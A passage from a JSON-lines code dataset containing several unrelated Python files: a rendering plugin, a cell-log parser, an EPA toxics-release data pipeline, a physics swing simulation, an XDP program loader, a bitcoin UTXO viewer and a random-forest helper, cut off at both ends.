\"Compensate camera exposure\",\n 'type' : 'BOOL',\n 'default' : False,\n },\n {\n 'attr' : 'multiplyByOpacity',\n 'desc' : \"When enabled the color of the light brdf is multiplied by the brdf's opacity (inverse of the brdf's transparency)\",\n 'type' : 'BOOL',\n 'default' : False,\n },\n)\n\nPluginWidget = \"\"\"\n{ \"widgets\": [\n { \"layout\" : \"SPLIT\",\n \"splits\" : [\n { \"layout\" : \"COLUMN\",\n \"attrs\" : [\n { \"name\" : \"doubleSided\" },\n { \"name\" : \"emitOnBackSide\" }\n ]\n },\n { \"layout\" : \"COLUMN\",\n \"attrs\" : [\n { \"name\" : \"compensateExposure\" },\n { \"name\" : \"multiplyByOpacity\" }\n ]\n }\n ]\n }\n]}\n\"\"\"\n","sub_path":"plugins/brdf/BRDFLight.py","file_name":"BRDFLight.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"621203047","text":"import sys\nfrom time import time\n\nclass TimeIt(object):\n def __init__(self, msg, silent=False):\n self._msg = msg\n self._start = None\n self._silent = silent\n\n def __enter__(self):\n if self._silent:\n return\n self._start = time()\n sys.stdout.write(self._msg)\n sys.stdout.flush()\n\n def __exit__(self, *args):\n if self._silent:\n return\n elapsed = time() - self._start\n print(' done (%.2f s)' % (elapsed,))\n sys.stdout.flush()\n","sub_path":"pandas_plink/_timeit.py","file_name":"_timeit.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"209932826","text":"from collections import defaultdict\nfrom pprint import pprint\nimport argparse\n\nFR = 1.0\nHR = 0.5\n\n\ndef _incrementator(line, resultdict, tower_id, use_type):\n '''helper function to fill result dict'''\n if \"FR\" in line:\n resultdict[tower_id][use_type] += FR\n return\n elif \"HR\" in line:\n resultdict[tower_id][use_type] += HR\n return\n else:\n return\n\n\ndef main_parser(logfile):\n '''main function to parse log file and show result'''\n result = defaultdict(lambda: {'SPEECH': 0.0, 'GPRS': 0.0, 'IDLE': 0.0})\n for line in logfile:\n if \"QUEUED\" in line and \"CELL\" in line:\n tower_id = logfile.next().split(\" \")[0] # find tower id\n\n if \"SPEECH\" in line and \"BUSY\" in line:\n _incrementator(line, result, tower_id, \"SPEECH\")\n\n if \"GPRS\" in line and \"BUSY\" in line and (\"NONE\" in line or \"EGPRS\" in line):\n _incrementator(line, result, tower_id, \"GPRS\")\n\n if \"IDLE\" in line and not \"NONE\" in line:\n _incrementator(line, result, tower_id, \"IDLE\")\n pprint(dict(result))\n logfile.close()\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n prog='CELL RESOURCES PARSER',\n )\n parser.add_argument('--f', type=argparse.FileType('r'), default=\"UsageBuffer.txt\")\n args = parser.parse_args()\n main_parser(args.f)\n","sub_path":"sparser.py","file_name":"sparser.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"470882585","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/8/1 11:11\nimport os\n\npath = os.path.abspath(os.path.dirname(os.getcwd()))\nimport sys\n\nsys.path.append(path)\nimport pymongo\n\n# 线上mongo\nMONGODB_URI = 'mongodb://192.168.8.130:27017'\n# MONGODB_NAME = \"doc\"\n# WORDS_NAME = 'Sougou_pdf_url_new'\n\ndb = pymongo.MongoClient(MONGODB_URI)\nsougou_url = db['sougou']['sougou_new_links']\n\nMONGODB_URI_two = 'mongodb://192.168.8.211:27017'\ndb_two = pymongo.MongoClient(MONGODB_URI_two)\ncon_proxy = db_two['proxy']\ncon_proxy_dongtai = db_two['proxy']['proxies_ip_dongtai']\nli_db_words = db_two['springer_meta_20180809']['keywords_cn']\nli_db_words_en = db_two['springer_meta_20180809']['keywords_en']\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"15507781","text":"# Este script se invoca de forma remota para lanzar despliegues de la aplicación de Voting App\n# La invocación se debe realizar de la siguiente forma:\n# cd /opt/xebialabs/xl-deploy-9.0.5-cli/bin/\n# ./cli.sh -f /home/jcla/Projects/xld-scripts/voting-app-k8s/undeployXLDVotingAppK8s.py\n# El usuario y la password están en el fichero /opt/xebialabs/xl-deploy-X-cli/conf/deployit.conf con el siguiente contenido\n# cli.username=admin\n# cli.password=password <- la password se modifica la primera vez que ejecutemos el cli\n\ndef undeployVotingApp(environment):\n taskID = deployment.createUndeployTask(\"Environments/application-voting-app-k8s/application-voting-app-k8s-{0}/application-voting-app-k8s-{0}/deployment-vote\".format(environment)).id\n print(\"taskId = {0}\".format(taskID))\n deployit.startTaskAndWait(taskID)\n\nfor e in ['dev', 'pre', 'pro']:\n undeployVotingApp(e)\n\n","sub_path":"voting-app-k8s/undeployXLDVotingAppK8s.py","file_name":"undeployXLDVotingAppK8s.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"110659558","text":"#!/usr/bin/env python\n\n# TRI import and processing\n# This script uses the TRI Basic Plus National Data File.\n# Data files:https://www.epa.gov/toxics-release-inventory-tri-program/tri-basic-plus-data-files-calendar-years-1987-2016\n# Documentation on file format: https://www.epa.gov/toxics-release-inventory-tri-program/tri-basic-plus-data-files-guides\n\nimport pandas as pd\nimport numpy as np\nimport time\nimport os.path\nfrom stewi.globals import unit_convert,set_dir,output_dir,data_dir,reliability_table,inventory_metadata,\\\n validate_inventory,write_validation_result,write_metadata,url_is_alive,get_relpath,lb_kg,g_kg\n\nimport logging\n\n# Set some metadata\nTRIyear = '2016'\ntri_metadata = inventory_metadata\ntri_url = 'https://www3.epa.gov/tri/current/US_' + TRIyear + '_v'\n\n\ndef get_current_version():\n version = 15# Most recent version of TRI Basic Plus as of writing this is v15\n while url_is_alive(tri_url + str(int(version + 1)) + '.zip'): version += 1\n return str(version)\n\n\n# Import list of fields from TRI that are desired for LCI\ndef imp_fields(tri_fields_txt):\n tri_required_fields_csv = tri_fields_txt\n tri_req_fields = pd.read_table(tri_required_fields_csv, header=None)\n tri_req_fields = list(tri_req_fields[0])\n return tri_req_fields\n\n\ntri_version = get_current_version()\ntri_url += tri_metadata['SourceVersion'] + '.zip'\ntri_required_fields = (imp_fields(data_dir + 'TRI_required_fields.txt'))\n\n\n# Import in pieces grabbing main fields plus unique amount and basis of estimate fields\n# assigns fields to variables\ndef concat_req_field(list):\n source_name = ['TRIFID','CHEMICAL NAME', 'CAS NUMBER','UNIT OF MEASURE'] + list\n return source_name\n\n\nfacility_fields = ['FACILITY NAME','FACILITY STREET','FACILITY CITY','FACILITY COUNTY','FACILITY STATE',\n 'FACILITY ZIP CODE','PRIMARY NAICS CODE','LATITUDE','LONGITUDE']\n\nfug_fields = ['TOTAL FUGITIVE AIR EMISSIONS','FUGITIVE OR NON-POINT AIR EMISSIONS - BASIS OF ESTIMATE']\nstack_fields = ['TOTAL STACK AIR EMISSIONS','STACK OR POINT AIR EMISSIONS - BASIS OF ESTIMATE']\nstreamA_fields = ['TOTAL DISCHARGES TO STREAM A','DISCHARGES TO STREAM A - BASIS OF ESTIMATE']\nstreamB_fields = ['TOTAL DISCHARGES TO STREAM B','DISCHARGES TO STREAM B - BASIS OF ESTIMATE']\nstreamC_fields = ['TOTAL DISCHARGES TO STREAM C','DISCHARGES TO STREAM C - BASIS OF ESTIMATE']\nstreamD_fields = ['TOTAL DISCHARGES TO STREAM D','DISCHARGES TO STREAM D - BASIS OF ESTIMATE']\nstreamE_fields = ['TOTAL DISCHARGES TO STREAM E','DISCHARGES TO STREAM E - BASIS OF ESTIMATE']\nstreamF_fields = ['TOTAL DISCHARGES TO STREAM F','DISCHARGES TO STREAM F - BASIS OF ESTIMATE']\nonsiteland_fields = ['TOTAL LAND TREATMENT','LAND TRTMT/APPL FARMING - BASIS OF ESTIMATE']\nonsiteother_fields = ['TOTAL OTHER DISPOSAL','OTHER DISPOSAL -BASIS OF ESTIMATE']\noffsiteland_fields = ['LAND TREATMENT']\noffsiteother_fields = ['OTHER LAND DISPOSAL']\n\nimport_facility = ['TRIFID'] + facility_fields\nimport_fug = concat_req_field(fug_fields)\nimport_stack = concat_req_field(stack_fields)\nimport_streamA = concat_req_field(streamA_fields)\nimport_streamB = concat_req_field(streamB_fields)\nimport_streamC = concat_req_field(streamC_fields)\nimport_streamD = concat_req_field(streamD_fields)\nimport_streamE = concat_req_field(streamE_fields)\nimport_streamF = concat_req_field(streamF_fields)\nimport_onsiteland = concat_req_field(onsiteland_fields)\nimport_onsiteother = concat_req_field(onsiteother_fields)\n# Offsite treatment does not include basis of estimate codes\nimport_offsiteland = concat_req_field(offsiteland_fields)\nimport_offsiteother = concat_req_field(offsiteother_fields)\n\nkeys = ['fug', 'stack', 'streamA', 'streamB', 'streamC', 'streamD', 'streamE', 'streamF', 'onsiteland', 'onsiteother',\n 'offsiteland', 'offsiteother']\n\nvalues = [import_fug, import_stack, import_streamA, import_streamB,\n import_streamC, import_streamD, import_streamE, import_streamF,\n import_onsiteland, import_onsiteother, import_offsiteland, import_offsiteother]\n\n\ndef dict_create(k, v):\n dictionary = dict(zip(k, v))\n return dictionary\n\n\n# Create a dictionary that had the import fields for each release type to use in import process\nimport_dict = dict_create(keys, values)\n\n# Import TRI file\nexternal_dir = set_dir(data_dir + '../../../')\ntri_csv = external_dir + 'TRI/US_' + TRIyear + '_v' + tri_version + '/US_1_' + TRIyear + '_v' + tri_version + '.txt'\n\ntri_release_output_fieldnames = ['FacilityID', 'CAS', 'FlowName', 'Unit', 'FlowAmount','Basis of Estimate','ReleaseType']\n\n\n# Cycle through file importing by release type, the dictionary key\ndef import_TRI_by_release_type(d):\n tri = pd.DataFrame()\n for k, v in d.items():\n #create a data type dictionary\n dtype_dict = {'TRIFID':\"str\", 'CHEMICAL NAME':\"str\", 'CAS NUMBER':\"str\",'UNIT OF MEASURE':\"str\"}\n #The amount column will have the index of 4 - set to float\n dtype_dict[v[4]] = \"float\"\n #If a basis of estimate field is present, set its type to string\n if len(v) > 5:\n dtype_dict[v[5]] = \"str\"\n #log.info('Importing '+k+' releases')\n tri_part = pd.read_csv(tri_csv, sep='\\t', header=0, usecols=v, dtype=dtype_dict,na_values=['NO'])\n #If errors are produced on import, can add param above error_bad_lines=False\n if k.startswith('offsite'):\n tri_part['Basis of Estimate'] = 'NA'\n tri_part['ReleaseType'] = k\n tri_part.columns = tri_release_output_fieldnames\n tri = pd.concat([tri,tri_part])\n return tri\n\n\ntri = import_TRI_by_release_type(import_dict)\nlen(tri)\n# 953004 for 2016\n# 980196 for 2015\n# 994032 for 2014\n# 995712 for 2013\n# 992364 for 2012\n# 988848 for 2011\n\n# drop NA for Amount, but leave in zeros\ntri = tri.dropna(subset=['FlowAmount'])\nlen(tri)\n#531157 for 2016\n#546111 for 2015\n#553481 for 2014\n#554590 for 2013\n#553041 for 2012\n#551027 for 2011\n\n\n# There is white space after some basis of estimate codes...remove it here\ndef strip_coln_white_space(df, coln):\n df[coln] = df[coln].str.strip()\n return df\n\n\ntri = strip_coln_white_space(tri, 'Basis of Estimate')\n\n#Convert to float if there are errors - be careful with this line\nif tri['FlowAmount'].values.dtype != 'float64':\n tri['FlowAmount'] = pd.to_numeric(tri['FlowAmount'], errors='coerce')\n\n#Drop 0 for FlowAmount\ntri = tri[tri['FlowAmount'] != 0]\nlen(tri)\n#100853 for 2016\n#103619 for 2015\n#104432 for 2014\n#104643 for 2013\n#105011 for 2012\n#104399 for 2011\n\n# Import reliability scores for TRI\ntri_reliability_table = reliability_table[reliability_table['Source']=='TRI']\ntri_reliability_table.drop('Source', axis=1, inplace=True)\n\n#Merge with reliability table to get\ntri = pd.merge(tri,tri_reliability_table,left_on='Basis of Estimate',right_on='Code',how='left')\n# Fill NAs with 5 for DQI reliability score\ntri['DQI Reliability Score'] = tri['DQI Reliability Score'].fillna(value=5)\n# Drop unneeded columns\n#tri.drop('Note',axis=1,inplace=True)\ntri.drop('Basis of Estimate',axis=1,inplace=True)\ntri.drop('Code',axis=1,inplace=True)\n\n# Replace source info with Context\nsource_cnxt = data_dir + 'TRI_ReleaseType_to_Compartment.csv'\nsource_to_context = pd.read_csv(source_cnxt)\ntri = pd.merge(tri, source_to_context, how='left')\n\n# Convert units to ref mass unit of kg\n# Create a new field to put converted amount in\ntri['Amount_kg'] = 0.0\ntri = unit_convert(tri, 'Amount_kg', 'Unit', 'Pounds', lb_kg, 'FlowAmount')\ntri = unit_convert(tri, 'Amount_kg', 'Unit', 'Grams', g_kg, 'FlowAmount')\n# drop old amount and units\ntri.drop('FlowAmount',axis=1,inplace=True)\ntri.drop('Unit',axis=1,inplace=True)\n\n# Rename cols to match reference format\ntri.rename(columns={'Amount_kg':'FlowAmount'},inplace=True)\ntri.rename(columns={'DQI Reliability Score':'ReliabilityScore'},inplace=True)\n\n#Store totals by releasetype\n#tri_totals_by_releasetype = tri.groupby('ReleaseType')['FlowAmount'].sum()\n#tri_totals_by_releasetype.to_csv('tri_totals_by_releasetype_'+TRIyear+'.csv')\n\n\n#Drop release type\ntri.drop('ReleaseType',axis=1,inplace=True)\n\n#Group by facility, flow and compartment to aggregate different release types\ngrouping_vars = ['FacilityID', 'FlowName','CAS','Compartment']\nwm = lambda x: np.average(x, weights=tri.loc[x.index, \"FlowAmount\"])\n# Define a dictionary with the functions to apply for a given column:\nf = {'FlowAmount': ['sum'], 'ReliabilityScore': {'weighted_mean': wm}}\n# Groupby and aggregate with your dictionary:\ntri = tri.groupby(grouping_vars).agg(f)\ntri = tri.reset_index()\ntri.columns = tri.columns.droplevel(level=1)\n\n#VALIDATE\ntri_national_totals = pd.read_csv(data_dir + 'TRI_'+ TRIyear + '_NationalTotals.csv',header=0,dtype={\"FlowAmount\":np.float})\ntri_national_totals['FlowAmount_kg']=0\ntri_national_totals = unit_convert(tri_national_totals, 'FlowAmount_kg', 'Unit', 'Pounds', 0.4535924, 'FlowAmount')\n# drop old amount and units\ntri_national_totals.drop('FlowAmount',axis=1,inplace=True)\ntri_national_totals.drop('Unit',axis=1,inplace=True)\n# Rename cols to match reference format\ntri_national_totals.rename(columns={'FlowAmount_kg':'FlowAmount'},inplace=True)\nvalidation_result = validate_inventory(tri, tri_national_totals, group_by='flow', tolerance=5.0)\nwrite_validation_result('TRI',TRIyear,validation_result)\n\n#FLOWS\nflows = tri.groupby(['FlowName','CAS','Compartment']).count().reset_index()\n#stack by compartment\nflowsdf = flows[['FlowName','CAS','Compartment']]\nflowsdf['FlowID'] = flowsdf['CAS']\n#export chemicals\n#!!!Still needs CAS number and FlowID\nflowsdf.to_csv(output_dir+'flow/'+'TRI_'+ TRIyear + '.csv', index=False)\n\n#FLOW BY FACILITY\n#drop CAS\ntri.drop(columns=['CAS'],inplace=True)\ntri_file_name = 'TRI_' + TRIyear + '.csv'\ntri.to_csv(output_dir + 'flowbyfacility/' + tri_file_name, index=False)\n\n#FACILITY\n##Import and handle TRI facility data\ntri_facility = pd.read_csv(tri_csv, sep='\\t', header=0, usecols=import_facility, error_bad_lines=False)\n#get unique facilities\ntri_facility_unique_ids = pd.unique(tri_facility['TRIFID'])\nlen(tri_facility_unique_ids)\n#2016: 21670\n#2015: 22131\n\ntri_facility_unique_rows = tri_facility.drop_duplicates()\nlen(tri_facility_unique_rows)\n#2016: 21738\n#2015: 22195\n#2014: 22291\n\n#Use group by to elimiate additional ID duplicates\n#tri_facility_unique_rows_agg = tri_facility_unique_rows.groupby(['TRIFID'])\n#tri_facility_final = tri_facility_unique_rows_agg.aggregate()\n\ntri_facility_final = tri_facility_unique_rows\n\n#rename columns\n\nTRI_facility_name_crosswalk = {\n 'TRIFID':'FacilityID',\n 'FACILITY NAME':'FacilityName',\n 'FACILITY STREET':'Address',\n 'FACILITY CITY':'City',\n 'FACILITY COUNTY':'County',\n 'FACILITY STATE': 'State',\n 'FACILITY ZIP CODE':'Zip',\n 'PRIMARY NAICS CODE':'NAICS',\n 'LATITUDE': 'Latitude',\n 'LONGITUDE':'Longitude'\n }\n\ntri_facility_final.rename(columns=TRI_facility_name_crosswalk,inplace=True)\n\ntri_facility_final.to_csv(output_dir+'facility/'+'TRI_'+ TRIyear + '.csv', index=False)\n\n\n# Record TRI metadata\ntry: retrieval_time = os.path.getctime(external_dir + 'TRI/US_' + TRIyear + '_v' + tri_version + '/US_1_' + TRIyear + '_v' + tri_version + '.zip')\nexcept:\n try: retrieval_time = os.path.getctime(tri_csv)\n except: retrieval_time = time.time()\ntri_metadata['SourceAquisitionTime'] = time.ctime(retrieval_time)\ntri_metadata['SourceFileName'] = get_relpath(tri_csv)\ntri_metadata['SourceURL'] = tri_url\ntri_metadata['SourceVersion'] = tri_version\n\nwrite_metadata('TRI', TRIyear, tri_metadata)\n","sub_path":"stewi/TRI.py","file_name":"TRI.py","file_ext":"py","file_size_in_byte":11786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"255347845","text":"import sys, random\r\nimport pygame\r\nimport pymunk\r\nimport pymunk.pygame_util\r\nfrom pygame.locals import *\r\nimport numpy as np\r\nfrom pygame.color import *\r\n\r\ndef add_swing(space):\r\n rotation_center_body = pymunk.Body(body_type = pymunk.Body.STATIC)\r\n rotation_center_body.position = (300,300)\r\n\r\n rod = pymunk.Body()\r\n rod.position = (300,138)\r\n rod_u = pymunk.Segment(rod, (0,162), (0,0), 2.0)\r\n rod_u.mass = 2.2\r\n rod_u.filter = pymunk.ShapeFilter(categories=1)\r\n rod_u.color = THECOLORS[\"black\"]\r\n\r\n seat_pivot = pymunk.Body()\r\n seat_pivot.position = (300,118)\r\n rod_l = pymunk.Segment(seat_pivot, (0,20), (0,0), 2.0)\r\n rod_l.mass = 0.3\r\n rod_l.color = THECOLORS[\"green\"]\r\n\r\n\r\n seat = pymunk.Poly(seat_pivot, [(-5, 2), (5, 2), (5,-2),(-5,-2)])\r\n seat.mass = 1.065\r\n seat.color = THECOLORS[\"pink\"]\r\n\r\n ceiling_joint = pymunk.PivotJoint(rod, rotation_center_body, (0,162), (0,0))\r\n pivot_joint = pymunk.PivotJoint(rod,seat_pivot,(0,0),(0,20))\r\n pivot_joint._set_collide_bodies(False)\r\n pivot_fric = pymunk.GearJoint(rod,seat_pivot,0,1)\r\n pivot_fric.max_force = 1000\r\n space.add(rod_u,rod_l, seat, rod, seat_pivot, ceiling_joint, pivot_joint,pivot_fric)\r\n\r\n return rod,seat_pivot\r\n\r\ndef add_robot(space,rod,seat):\r\n #define robot upper body and upper leg\r\n robot_body = pymunk.Body()\r\n robot_u = pymunk.Poly(robot_body,[(-4,31.64),(-4,0),(4,0),(4,31.64)])\r\n robot_u.mass = 3.311\r\n robot_u.color = THECOLORS[\"red\"]\r\n robot_u.filter = pymunk.ShapeFilter(mask=pymunk.ShapeFilter.ALL_MASKS ^ 1)\r\n\r\n robot_body.position = seat.position\r\n robot_u_leg = pymunk.Poly(seat,[(0,2),(-15,2),(-15,8),(0,8)])\r\n robot_u_leg.color = THECOLORS[\"red\"]\r\n robot_u_leg.mass = 0.603\r\n\r\n #define robot lower leg\r\n robot_leg = pymunk.Body()\r\n robot_leg.position = seat.position\r\n robot_l_leg = pymunk.Poly(robot_leg,[(-15,2),(-15,-14.8),(-9,-14.8),(-9,2)])\r\n robot_l_leg.mass = 1.214\r\n robot_l_leg.color = THECOLORS[\"red\"]\r\n space.add(robot_body,robot_u,robot_u_leg,robot_leg,robot_l_leg)\r\n\r\n #motor and pivot for hip\r\n seat_motor = pymunk.SimpleMotor(seat,robot_body,0)\r\n seat_motor.max_force = 1e6\r\n seat_pivot = pymunk.PivotJoint(seat,robot_body,seat.position)\r\n seat_pivot._set_collide_bodies(False)\r\n seat_pivot_lim = pymunk.RotaryLimitJoint(robot_body,seat,0,1.11529)\r\n space.add(seat_motor,seat_pivot,seat_pivot_lim)\r\n\r\n #motor and pivot for knee\r\n knee_motor = pymunk.SimpleMotor(seat,robot_leg,0)\r\n knee_motor.max_force = 1e5\r\n knee_pivot = pymunk.PivotJoint(seat,robot_leg,seat.position+(-13,2))\r\n knee_pivot._set_collide_bodies(False)\r\n knee_pivot_lim = pymunk.RotaryLimitJoint(seat,robot_leg,-1.04604,0.44604)\r\n space.add(knee_motor,knee_pivot,knee_pivot_lim)\r\n\r\n return seat_motor,knee_motor,robot_body\r\n\r\ndef initialise():\r\n space = pymunk.Space()\r\n space.gravity = (0, -981)\r\n space.damping = 0.95\r\n\r\n swing,seat = add_swing(space)\r\n seat_motor,knee_motor,robot_u = add_robot(space,swing,seat)\r\n\r\n swing.apply_force_at_local_point((40000,0),(0,0))\r\n\r\n pygame.init()\r\n screen = pygame.display.set_mode((600, 600))\r\n pygame.display.set_caption(\"I'm so swungover\")\r\n clock = pygame.time.Clock()\r\n font = pygame.font.SysFont(\"Arial\", 16)\r\n draw_options = pymunk.pygame_util.DrawOptions(screen)\r\n return [space,swing,seat,robot_u,seat_motor,knee_motor,screen,draw_options,clock,font]\r\n\r\ndef stepper(space,swing,seat,robot_u,seat_motor,knee_motor,screen,draw_options,clock,font,action):\r\n if action == 2:\r\n seat_motor.rate = 2.788225\r\n knee_motor.rate = 3.7302\r\n elif action == 1:\r\n seat_motor.rate = 0\r\n knee_motor.rate = 0\r\n elif action == 0:\r\n seat_motor.rate = -2.788225\r\n knee_motor.rate = -3.7302\r\n\r\n screen.fill((255,255,255))\r\n space.debug_draw(draw_options)\r\n screen.blit(font.render(\"Angle = \" + str(swing._get_angle()),1, THECOLORS[\"black\"]), (0,0))\r\n screen.blit(font.render(\"Swing Velocity = \" + str(swing._get_angular_velocity()),1, THECOLORS[\"black\"]), (0,20))\r\n pygame.display.flip()\r\n clock.tick(50)\r\n\r\n space.step(1.0/50.0)\r\n\r\n #return values\r\n rod_angle = swing._get_angle()\r\n rod_ang_vel = swing._get_angular_velocity()\r\n seat_angle = seat._get_angle()\r\n seat_ang_vel = seat._get_angular_velocity()\r\n body_pos = robot_u._get_angle()-seat_angle\r\n\r\n return [rod_angle,rod_ang_vel,seat_angle,seat_ang_vel,body_pos],[space,swing,seat,robot_u,seat_motor,knee_motor,screen,draw_options,clock,font]\r\n\r\n","sub_path":"MachineLearning/Will's work/Early Learning Processes/Gnarl Evolution Learning/Seated_Pivot_Swinging_ML_Display.py","file_name":"Seated_Pivot_Swinging_ML_Display.py","file_ext":"py","file_size_in_byte":4595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"618880456","text":"import os\nfrom os.path import expanduser\nimport sys\nimport argparse \n\ninterfaces = [\"ens3f1\"]\nprograms = {\n \"xdp2\": (\"xdp2_kern\", \"completed-programs/kernel_samples_xdp2_kern_xdp1_runtime_debug\"),\n \"xdp_fw\": (\"xdp_fw_kern\", \"completed-programs/simple_fw_xdp_fw_runtime_debug\"),\n \"xdp_router_ipv4\": (\"xdp_router_ipv4_kern\", \"completed-programs/kernel_samples_xdp_router_ipv4_runtime_debug\"),\n \"xdp_fwd\": (\"xdp_fwd_kern\", \"completed-programs/kernel_samples_xdp_fwd_kern_xdp_fwd_runtime_debug\")\n}\nparser = argparse.ArgumentParser(description='Information about Data')\nparser.add_argument('-b', dest=\"benchmark\", type=str, help=f\"Benchmark {str(programs.keys())}\", required=True)\nparser.add_argument('-v', dest=\"version\", type=str, help='Name of version (e.g O1, O2, K0, K1, K2, K3, K4)', required=True)\nargs = parser.parse_args()\n\nhome = expanduser(\"~\")\nhome = \"/usr/local\"\n# read interfaces\nf = open(f\"{home}/trex-configuration/scripts/device.config\", \"r\")\ndevice = f.read()\ndevice = device.strip('\\n')\nf.close()\ni = open(f\"{home}/trex-configuration/scripts/{device}.config\", \"r\")\ninterfaces = i.read().split(\"\\n\")\n\nos.chdir(f\"{home}/throughput-experiments\")\nfor x in interfaces:\n os.system(f\"sudo ip link set dev {x} xdp off\")\n\nnumber = list(args.version)[1]\nif \"k\" in args.version.lower():\n os.system(f\"sudo cp {programs[args.benchmark][1]}/top-progs/{programs[args.benchmark][0]}{number}.o {programs[args.benchmark][0]}.o\")\nelse:\n os.system(f\"sudo cp {args.version.upper()}/{programs[args.benchmark][0]}.o .\")\n\n# load program \n\nif args.benchmark == \"xdp1\":\n os.system(f\"sudo ./xdp1 -N {interfaces[0]}\")\nelif args.benchmark == \"xdp2\":\n os.system(f\"sudo ./xdp2 -N {interfaces[0]}\")\nelif args.benchmark == \"xdp_pktcntr\":\n os.system(f\"sudo ip link set dev {interfaces[0]} xdp obj xdp_pktcntr.o sec xdp-pktcntr\")\nelif args.benchmark == \"xdp_redirect\":\n if len(interfaces) == 1:\n os.system(f\"sudo ./xdp_redirect -N {interfaces[0]} -N {interfaces[0]}\")\n else: \n os.system(f\"sudo ./xdp_redirect -N {interfaces[0]} -N {interfaces[1]} \")\nelif args.benchmark == \"xdp_map_access\":\n os.system(f\"sudo ./xdp_map_access -N {interfaces[0]}\")\nelif args.benchmark == \"xdp_fw\":\n os.system(f\"sudo ./xdp_fw\")\nelif args.benchmark == \"xdp_router_ipv4\":\n os.system(f\"sudo ./xdp_router_ipv4 -S {interfaces[0]}\")\nelif args.benchmark == \"xdp_fwd\":\n os.system(f\"sudo ./xdp_fwd {' '.join(interfaces)}\")","sub_path":"scripts/load_xdp.py","file_name":"load_xdp.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"70186694","text":"from PyQt5 import uic\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom bit.network import NetworkAPI\nimport threading\n\nclass MyWinClass(QMainWindow):\n\n # 一个自定义的信号\n sig_unspents_arrived = pyqtSignal(object)\n\n def __init__(self):\n super().__init__()\n win = uic.loadUi(\"bitcoin_beta.ui\", self)\n win.show()\n\n def get_account(self):\n # 查询中界面设置\n self.treeWidget.setHidden(True)\n self.pushButton.setEnabled(False)\n self.label_2.setText( '查询中......' )\n\n # 启动新的线程进行查询\n addr = self.lineEdit.text()\n t=threading.Thread(target=self.get_utxo,args=(addr,))\n t.start()\n\n def get_utxo(self, addr):\n \"\"\"查询,当返回时发射信号sig_unspents_arrived\"\"\"\n unspents = NetworkAPI.get_unspent(addr)\n self.sig_unspents_arrived.emit(unspents)\n\n def handle_unspents_arrived(self, unspents):\n \"\"\"根据查询结果调整界面显示\"\"\"\n self.pushButton.setEnabled(True)\n\n if len(unspents)==0:\n self.label_2.setText( '

0

' )\n else:\n self.treeWidget.clear()\n self.treeWidget.setHidden(False)\n s=sum(unspent.amount for unspent in unspents)\n self.label_2.setText( '

%d

'%(s) )\n for utxo in unspents:\n root=QTreeWidgetItem(self.treeWidget)\n root.setText(0,'amount')\n root.setText(1,str(utxo.amount))\n txid = QTreeWidgetItem(root)\n txid.setText(0,'txid')\n txid.setText(1,utxo.txid)\n txindex = QTreeWidgetItem(root)\n txindex.setText(0,'txindex')\n txindex.setText(1,str(utxo.txindex))\n script = QTreeWidgetItem(root)\n script.setText(0,'script')\n script.setText(1,utxo.script)\n confirmations = QTreeWidgetItem(root)\n confirmations.setText(0,'confirmations')\n confirmations.setText(1,str(utxo.confirmations))\n segwit = QTreeWidgetItem(root)\n segwit.setText(0,'segwit')\n segwit.setText(1,str(utxo.segwit))\n\napp = QApplication([])\nmyWin = MyWinClass()\n\napp.exec_()\n","sub_path":"06.图形用户界面/programs/bitcoin_beta2.py","file_name":"bitcoin_beta2.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"146974434","text":"from sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import ExtraTreesClassifier, RandomForestClassifier\nfrom pandas import read_csv\nfrom os import path as os_path\nfrom json import loads\nfrom csv import DictWriter as csv_writer\nfrom pickle import dumps as pdumps\n\n\ndef make_model(path, test_data, training_data, test, config, log):\n ''' generate a random forest classifier '''\n try:\n rfc = RandomForestClassifier(n_estimators=config.get('estimators', 100))\n rfc.fit(\n training_data.as_matrix(config['features'][test]),\n training_data.as_matrix(config['classes'])\n )\n return rfc\n except ValueError:\n log.error('Faulty data in training set')\n return None\n\n\ndef analyze_data(test, config, log):\n '''\n build a random forest and score data, based on the example found here:\n - http://www.analyticbridge.com/profiles/blogs/random-forest-in-python\n '''\n path = config.get('path', './data')\n try:\n training_data = read_csv('/'.join((path, test, 'train.csv')))\n test_data = read_csv('/'.join((path, test, 'test.csv')))\n rfc = make_model(path, test_data, training_data, test, config, log)\n if rfc:\n results = rfc.predict(test_data.as_matrix(config['features'][test]))\n log.info(results)\n\n test_data['predictions'] = results\n log.info(test_data.head())\n else:\n log.error('Failed to generate model')\n return None\n except Exception as e:\n log.error('Data analysis failed to run')\n log.debug(e)\n return None\n else:\n return results\n\ndef build_csv(name, test_type, data, config, log, test=False):\n ''' dump JSON data to CSV file '''\n\n data = loads(data)\n cols = ['name'] + [key for key in data]\n data['name'] = name\n log.debug(data)\n\n # changing mode from ab+ to a+ and wb+ to w+\n # for python3 compatibility\n filename = 'train.csv'\n mode = 'a+'\n\n if test:\n filename = 'test.csv'\n mode = 'w+'\n\n path = config.get('path', './data')\n csv_file = '/'.join((path, test_type, filename))\n\n file_exists = False\n try:\n if os_path.isfile(csv_file):\n if os_path.getsize(csv_file) > 0:\n log.info('Training file exists')\n file_exists = True\n except OSError:\n log.error('Failed to validate if file exists')\n return False\n else:\n try:\n with open(csv_file, mode) as csvf:\n writer = csv_writer(csvf, 